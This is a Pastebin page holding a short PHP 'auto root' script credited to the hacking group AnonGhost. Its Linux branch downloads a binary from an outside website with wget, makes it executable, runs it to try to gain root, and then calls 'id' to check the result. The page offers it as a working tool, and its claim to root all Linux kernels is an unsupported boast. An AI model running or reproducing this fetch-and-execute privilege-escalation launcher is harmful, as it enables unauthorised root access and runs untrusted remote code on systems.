ajixcrew

PHP Auto root 2013 Version 2.0

Jun 8th, 2013
466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.40 KB | None | 0 0
  1. #!/usr/bin/php
  2.  
  3. <?php
  4.  
  5. /*
  6.  
  7. # PHP Auto root 2013 Version 2.0 Coded
  8. ~ ajixcrew Cyber4rt ~ http://ajixcrew.blogspot.com/
  9.  
  10. # AnonGhost is Everywhere
  11.  
  12. # <3 AnonGhost <3
  13.  
  14. */
  15.  
  16. set_time_limit(0);
  17.  
  18. system("clear");
  19.  
  20. print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n";
  21.  
  22. print "|PHP Auto Root Version 2.0 |\n";
  23.  
  24. print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n";
  25.  
  26. print "|Priv8 Version |\n";
  27.  
  28. print "|Rooting: All Linux Kernels |\n";
  29.  
  30. print "| <3 AnonGhost <3 |\n";
  31.  
  32. print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n";
  33.  
  34. sleep(4);
  35.  
  36. print "\nKernel to verify:\n";
  37.  
  38. print "lnx or bsd: ";
  39.  
  40. $kernel = fgets(STDIN);
  41.  
  42. $kernel = trim($kernel);
  43.  
  44. if($kernel == "lnx")
  45.  
  46. {
  47.  
  48. print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n";
  49.  
  50. print "|PHP Auto Root |\n";
  51.  
  52. print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n";
  53.  
  54. print "|Selected kernel : |Linux arq| |\n";
  55.  
  56. print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n";
  57.  
  58. sleep(2);
  59.  
  60. print "\n[+] Testing lnx Exploit please wait....\n";
  61.  
  62. print "[~] Smoke Marijuana XD !!!! (:\n";
  63.  
  64. sleep(2);
  65.  
  66. system("mkdir lnx;chmod 0777 lnx;cd lnx/");
  67.  
  68. system("wget http://perlesbleues.com/language/fr-FR/a.out");
  69.  
  70. system("chmod +x a.out");
  71.  
  72. system("./a.out");
  73.  
  74. sleep(1);
  75.  
  76. system("id");
  77.  
  78. exit(0);
  79.  
  80. }
  81.  
  82. //EOF_
  83.  
  84. //2013
  85.  
  86. //Priv8 Version
  87.  
  88. ?>
Advertisement
Add Comment
Please, Sign In to add comment